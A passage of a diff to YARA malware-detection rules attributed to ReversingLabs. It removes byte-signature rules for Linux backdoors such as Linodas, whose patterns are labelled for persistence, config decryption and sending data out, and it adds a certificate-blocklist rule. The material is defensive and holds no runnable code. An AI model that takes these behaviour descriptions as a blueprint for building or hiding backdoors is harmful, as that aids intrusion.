?? ?? ?? 48 89 D1 F2 AE 48 - } - $change_name_on_system_p2 = { - 89 CB 48 8D BC 24 ?? ?? ?? ?? 48 89 D1 F2 AE F7 D3 8D 5C 0B ?? 85 DB B8 ?? ?? ?? ?? - 0F 4E D8 48 8D B4 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 - 89 EF B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 48 8D 79 ?? 48 63 D3 48 63 - FF 48 8D 7C 3D ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? - ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? - C6 84 24 ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 49 89 C6 48 - 8D B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C3 48 89 E7 B9 ?? - ?? ?? ?? B8 ?? ?? ?? ?? F3 48 AB C6 07 ?? 48 89 E5 41 BC ?? ?? ?? ?? 41 BD ?? ?? ?? - ?? EB ?? 48 89 EF 4C 89 E9 4C 89 E0 F3 48 AB C6 07 ?? 48 89 D9 BA ?? ?? ?? ?? BE ?? - ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 7E ?? 48 63 D0 4C 89 F1 BE ?? ?? ?? ?? 48 89 - E7 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 - F7 E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 85 C0 75 ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? - ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 85 C0 7E - ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? - ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E C3 - } - $decrypt_configuration_p1 = { - 41 57 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 7C 24 ?? 48 8D 9C 24 ?? ?? - ?? ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 DF F3 48 AB C6 07 ?? 48 8D 54 24 ?? B1 ?? - 48 89 D7 F3 48 AB C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 - 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? 48 8D 54 24 ?? 0F B7 35 ?? ?? - ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? - ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F 46 D1 BE ?? - ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? 48 8D 74 24 ?? 48 89 - DF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 50 ?? 48 89 54 24 ?? C6 00 ?? 48 - 8D 74 24 ?? 48 89 D7 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 48 ?? 48 89 4C - 24 ?? C6 00 ?? 48 8D 74 24 ?? 48 89 CF E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 85 C0 0F 84 - ?? ?? ?? ?? C6 00 ?? 48 8D B4 24 ?? ?? ?? ?? 48 C7 C5 ?? ?? ?? ?? 48 89 F7 41 BC ?? - ?? ?? ?? 48 89 E9 44 89 E0 F2 AE 48 F7 D1 48 01 E9 48 8D 5C 24 ?? 48 81 F9 ?? ?? ?? - ?? BA ?? ?? ?? ?? 48 0F 46 D1 48 89 DF E8 ?? ?? ?? ?? 48 89 DF 48 89 E9 44 89 E0 F2 - AE 48 89 CD 48 F7 D5 83 ED ?? 8D 45 ?? 48 98 80 7C 04 ?? ?? 74 ?? 48 63 C5 C6 44 04 - ?? ?? 83 C5 ?? 48 63 ED C6 44 2C ?? ?? 4C 8D 6C 24 ?? 4C 89 EB BD ?? ?? ?? ?? C7 44 - 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 41 BC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? 49 C7 C6 ?? ?? ?? ?? 4D 89 EF E9 ?? ?? ?? ?? 0F B6 03 3C ?? 75 - ?? 44 8B 64 24 ?? 4D 6B E4 ?? 4C 03 64 24 ?? 49 8D 7C 24 ?? 83 7C 24 ?? ?? BA ?? ?? - ?? ?? 0F 4E 54 24 ?? 48 63 D2 8B 74 24 ?? 48 8D 44 24 ?? 48 8D 34 30 E8 - } - $decrypt_configuration_p2 = { - 0F B7 54 24 ?? 66 41 89 54 24 ?? 83 44 24 ?? ?? 83 7C 24 ?? ?? 77 ?? 89 6C 24 ?? 41 - BC ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 48 8D 7B ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? - ?? ?? 66 89 44 24 ?? 44 89 64 24 ?? EB ?? 41 83 C4 ?? 83 C5 ?? 48 83 C3 ?? 4C 89 F1 - 4C 89 FF B8 ?? ?? ?? ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 89 D8 4C 29 E8 48 39 C8 0F 82 - ?? ?? ?? ?? 8B 4C 24 ?? 48 8B 54 24 ?? 89 8A ?? ?? ?? ?? 48 8D 5C 24 ?? B9 ?? ?? ?? - ?? B8 ?? ?? ?? ?? 48 89 DF F3 48 AB 48 8B 7C 24 ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 - D1 48 8D 51 ?? 48 8B 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 44 - 24 ?? C6 80 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 54 24 ?? C6 82 ?? ?? ?? ?? ?? - 80 7C 24 ?? ?? 75 ?? 48 8B 4C 24 ?? C6 81 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B - 44 24 ?? C6 80 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 54 24 ?? C6 82 ?? ?? ?? ?? - ?? 80 7C 24 ?? ?? 75 ?? 48 8B 4C 24 ?? C6 81 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 - 8B 44 24 ?? C6 80 ?? ?? ?? ?? ?? 48 8D 5C 24 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 89 - DF F3 48 AB 48 8B 7C 24 ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 81 F9 - ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F 46 D1 48 8B 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? C6 44 - 24 ?? ?? C6 44 24 ?? ?? 48 8D 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? - ?? ?? 48 8D 7C 24 ?? B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 83 E9 ?? 8D - } - $decrypt_configuration_p3 = { - 41 ?? 48 98 80 7C 04 ?? ?? 74 ?? 48 63 C1 C6 44 04 ?? ?? 83 C1 ?? 48 63 C9 C6 44 0C - ?? ?? 4C 89 EB BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 49 C7 - C4 ?? ?? ?? ?? 4C 8D 74 24 ?? 41 BF ?? ?? ?? ?? EB ?? 0F B6 03 3C ?? 75 ?? 8B 7C 24 - ?? 48 8D 54 24 ?? 48 8D 3C 3A BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 - ?? 48 81 C2 ?? ?? ?? ?? 48 8B 4C 24 ?? 66 89 44 91 ?? 0F B7 44 24 ?? 66 89 44 91 ?? - 83 44 24 ?? ?? 83 7C 24 ?? ?? 77 ?? 89 6C 24 ?? EB ?? 3C ?? 75 ?? 48 8D 7B ?? BA ?? - ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 44 24 ?? 83 C5 ?? 48 83 C3 ?? 4C 89 E1 - 4C 89 F7 44 89 F8 F2 AE 48 F7 D1 48 83 E9 ?? 48 89 D8 4C 29 E8 48 39 C8 0F 82 ?? ?? - ?? ?? 8B 4C 24 ?? 48 8B 54 24 ?? 89 8A ?? ?? ?? ?? EB ?? 48 8B 44 24 ?? C7 80 ?? ?? - ?? ?? ?? ?? ?? ?? 48 8B 7C 24 ?? 48 83 C7 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? - ?? ?? 85 C0 BA ?? ?? ?? ?? 0F 4E C2 48 8B 54 24 ?? 89 82 ?? ?? ?? ?? B8 ?? ?? ?? ?? - EB ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3 - } - $encrypt_and_send_data = { - 48 89 5C 24 ?? 48 89 6C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 4C 89 74 24 ?? 4C 89 7C - 24 ?? 48 83 EC ?? 41 89 FC 48 89 F5 49 89 D6 41 89 CD 48 85 F6 0F 84 ?? ?? ?? ?? BF - ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C3 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 89 03 - 0F B6 45 ?? 88 43 ?? 8B 6B ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? BA ?? - ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 44 89 E9 BA ?? ?? ?? ?? 48 89 DE 44 - 89 E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? 48 - 89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 ED 74 - ?? 4D 85 F6 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 - ?? ?? ?? ?? 4C 63 FD 4C 89 FF E8 ?? ?? ?? ?? 48 89 C3 48 85 C0 74 ?? 4C 89 FA 4C 89 - F6 48 89 C7 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 EE 48 89 DF E8 ?? ?? ?? ?? 44 89 E9 89 - EA 48 89 DE 44 89 E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 - ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 48 8B 3D ?? ?? ?? ?? 48 83 - C7 ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 48 - 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 4C 8B 74 24 ?? 4C 8B 7C 24 - ?? 48 83 C4 ?? C3 - } - $receive_and_decrypt_data = { - 48 89 5C 24 ?? 48 89 6C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 48 83 EC ?? 41 89 FC 48 - 89 F3 49 89 D5 89 CD 48 85 F6 74 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? - ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 8B 53 ?? 85 D2 74 ?? 4D 85 ED 75 ?? - B8 ?? ?? ?? ?? EB ?? 81 FA ?? ?? ?? ?? 77 ?? 89 E9 4C 89 EE 44 89 E7 E8 ?? ?? ?? ?? - 85 C0 74 ?? 8B 73 ?? BA ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8 - ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 48 83 C4 ?? - C3 - } - condition: - uint32(0)==0x464C457F and (( all of ($change_name_on_system_p*)) and ( all of ($decrypt_configuration_p*)) and ($encrypt_and_send_data) and ($receive_and_decrypt_data)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HANGA GIP d.o.o." and (pe.signatures[i].serial=="00:aa:07:d4:f2:85:71:19:ce:e5:14:a0:bd:41:2f:82:01" or pe.signatures[i].serial=="aa:07:d4:f2:85:71:19:ce:e5:14:a0:bd:41:2f:82:01") and 1615766400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Linux_Backdoor_Linodas : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_40F5660A90301E7A8A8C3B42 : INFO FILE { meta: - description = "Yara rule that detects Linodas backdoor." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2b197346-abce-5cff-938f-bb8742e03168" - date = "2024-05-22" - modified = "2024-05-22" + id = "c47bb4f0-d60b-5948-ac10-6083606ed46a" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/backdoor/Linux.Backdoor.Linodas.yara#L1-L216" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "12445771106e36b74b1ea292a8a25cab66bcaf0a08cf88d39a9f1bb13c6f525b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12122-L12138" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3573d1d5f11df106f1f6f44f8b0164992f2a50707c6df7b08b05ed9ea7d9173b" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Backdoor" - tc_detection_name = "Linodas" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $persistence_mechanism_ubuntu = { - 41 54 BE ?? ?? ?? ?? 55 53 48 81 EC ?? ?? ?? ?? 48 8D 6C 24 ?? 48 8D 54 24 ?? 48 89 - EF E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 5C 24 ?? 48 - 89 EE 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48 - 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 6C 24 ?? 48 8D 54 24 ?? BE ?? ?? ?? ?? 48 - 89 EF E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 5C 24 ?? - 48 89 EE 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? - 48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 5C 24 ?? 48 89 EE 48 89 DF E8 ?? ?? ?? - ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 41 BC ?? ?? ?? ?? 48 83 EB ?? 4C 39 E3 0F - 85 ?? ?? ?? ?? 4C 8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7 - E8 ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 - 74 ?? 48 8B 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 - 8D 5C 24 ?? 4C 8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 - ?? ?? ?? ?? 48 89 DE 48 89 E7 E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F - 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? BA - ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 5C 24 ?? 4C 8B 44 24 - ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE 48 - 89 E7 E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ?? BE ?? ?? - ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? - ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ?? - 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 - 39 DC 0F 85 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C C3 - } - $network_communication_1 = { - 48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 F3 4C 89 64 24 ?? 4C 89 6C 24 ?? 48 81 EC ?? ?? - ?? ?? 48 8B 06 48 89 FD 89 54 24 ?? 45 89 C4 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 4C 8D - 6C 24 ?? 48 8B 33 4C 89 EF E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 78 ?? ?? 0F 84 ?? ?? - ?? ?? 45 84 E4 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 88 45 - ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? - ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 89 C5 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 41 B8 ?? ?? ?? - ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? - ?? ?? ?? 48 8D 5C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? - 41 B8 ?? ?? ?? ?? 89 EF 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? 48 8B 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 48 C7 44 24 ?? ?? ?? - ?? ?? 66 C1 C8 ?? 66 C7 44 24 ?? ?? ?? 66 89 44 24 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? - 89 44 24 ?? 48 89 DE 89 EF E8 ?? ?? ?? ?? 83 C0 ?? 0F 84 ?? ?? ?? ?? 0F 1F 44 00 ?? - 48 8B 5C 24 ?? 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 89 E8 48 8B 5C 24 - ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 - } - $network_communication_2 = { - 48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 FB 4C 89 64 24 ?? BE ?? ?? ?? ?? 48 83 EC ?? BF - ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? - ?? ?? ?? 48 8D 73 ?? 48 8D 53 ?? BF ?? ?? ?? ?? 48 8D 6C 24 ?? 45 31 E4 E8 ?? ?? ?? - ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 73 ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 - 78 ?? ?? 74 ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? - 4C 8D 64 24 ?? 48 89 EE 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E6 48 89 DF E8 ?? ?? ?? ?? 48 - 8B 6C 24 ?? 41 89 C4 48 83 ED ?? 48 81 FD ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 45 84 E4 74 - ?? 80 7B ?? ?? 0F 84 ?? ?? ?? ?? 90 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 41 0F B6 - EC 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 89 E8 48 8B 5C 24 ?? 48 8B 6C - 24 ?? 4C 8B 64 24 ?? 48 83 C4 ?? C3 - } - $persistence_mechanism_redhat_v11 = { - 41 57 41 56 41 55 41 54 55 53 48 83 EC ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24 - ?? 8B 7D ?? 4C 8D 7D ?? 81 C7 ?? ?? ?? ?? 48 63 FF E8 ?? ?? ?? ?? 48 89 C3 48 8D 7C - 24 ?? 48 89 EE E8 ?? ?? ?? ?? 4C 8B 6C 24 ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 4C 8D 74 - 24 ?? 4C 89 EA E8 ?? ?? ?? ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 4C 89 F7 E8 - ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 E9 4C 89 EA BE ?? - ?? ?? ?? 48 89 DF 49 89 E9 4D 89 E8 31 C0 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 89 C4 B9 - ?? ?? ?? ?? 89 C2 48 89 DE E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 - 0F 85 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 DF BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89 - DF E8 ?? ?? ?? ?? 4C 89 EA BE ?? ?? ?? ?? 48 89 DF 31 C0 48 8D 6C 24 ?? E8 ?? ?? ?? - ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 48 89 EF E8 ?? ?? ?? ?? 48 89 E7 31 C9 - BA ?? ?? ?? ?? 48 89 EE E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 41 BE ?? ?? ?? ?? 4C 8B 24 24 - 48 83 ED ?? 4C 39 F5 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 85 - C0 0F 84 ?? ?? ?? ?? 48 89 DF 49 8D 5C 24 ?? E8 ?? ?? ?? ?? 49 39 DE 0F 85 ?? ?? ?? - ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 49 8D 5D ?? 49 39 DE 0F 85 - ?? ?? ?? ?? 49 81 FF ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 - 5E 41 5F C3 - } - $change_timestamp_and_read_config_v11 = { - 55 53 48 83 EC ?? 48 8D 5C 24 ?? 48 89 E7 E8 ?? ?? ?? ?? 48 89 E6 48 89 DF E8 ?? ?? - ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85 - ?? ?? ?? ?? 48 89 E6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 BE ?? ?? ?? ?? 48 89 - DF E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 C0 ?? 89 C5 29 DD 8D 7D ?? 48 63 FF E8 ?? ?? - ?? ?? 48 63 D5 48 89 C3 48 89 C7 C6 04 02 ?? 48 8B 34 24 E8 ?? ?? ?? ?? 48 89 DF E8 - ?? ?? ?? ?? 48 89 DE 48 89 C2 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? - BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 B8 ?? ?? ?? - ?? 48 83 EB ?? 48 39 D8 75 ?? 48 83 C4 ?? 5B 5D C3 - } - $generate_machine_id_v11 = { - 41 57 BE ?? ?? ?? ?? 49 89 FF 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 9C - 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? - ?? 31 C9 BA ?? ?? ?? ?? 48 89 DE 4C 89 EF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 41 - BE ?? ?? ?? ?? 48 83 EB ?? 4C 39 F3 0F 85 ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8B - B4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8B 84 24 - ?? ?? ?? ?? 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 8D 94 24 ?? - ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 31 C9 BA ?? - ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 - DE 0F 85 ?? ?? ?? ?? 48 89 EE 4C 89 E7 E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8D - BC 24 ?? ?? ?? ?? 48 8B 56 ?? E8 ?? ?? ?? ?? 31 FF 4C 8B AC 24 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C6 48 8D BC 24 ?? ?? ?? - ?? F7 EA 89 F1 89 F5 C1 F9 ?? C1 FA ?? 29 CA 69 D2 ?? ?? ?? ?? 29 D5 E8 ?? ?? ?? ?? - 48 8B 9C 24 ?? ?? ?? ?? 41 89 E8 31 C0 4C 89 E9 BE ?? ?? ?? ?? 48 89 E7 48 89 DA 48 - 83 EB ?? E8 ?? ?? ?? ?? 49 39 DE 89 C5 0F 85 ?? ?? ?? ?? 48 63 C5 48 8D 94 24 ?? ?? - ?? ?? 48 8D BC 24 ?? ?? ?? ?? C6 04 04 ?? 48 89 E6 E8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? - ?? ?? 48 89 E6 4C 89 FF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE - 0F 85 ?? ?? ?? ?? 49 8D 5D ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 - 83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE 0F - 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 81 - C4 ?? ?? ?? ?? 4C 89 F8 5B 5D 41 5C 41 5D 41 5E 41 5F C3 - } - $persistence_mechanism_redhat_v7 = { - 48 89 6C 24 ?? 4C 89 7C 24 ?? 48 89 5C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 4C 89 74 - 24 ?? 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 8B 7D ?? 4C - 8D 7D ?? 81 C7 ?? ?? ?? ?? 48 63 FF E8 ?? ?? ?? ?? 48 89 C3 48 8D 7C 24 ?? 48 89 EE - E8 ?? ?? ?? ?? 4C 8B 64 24 ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 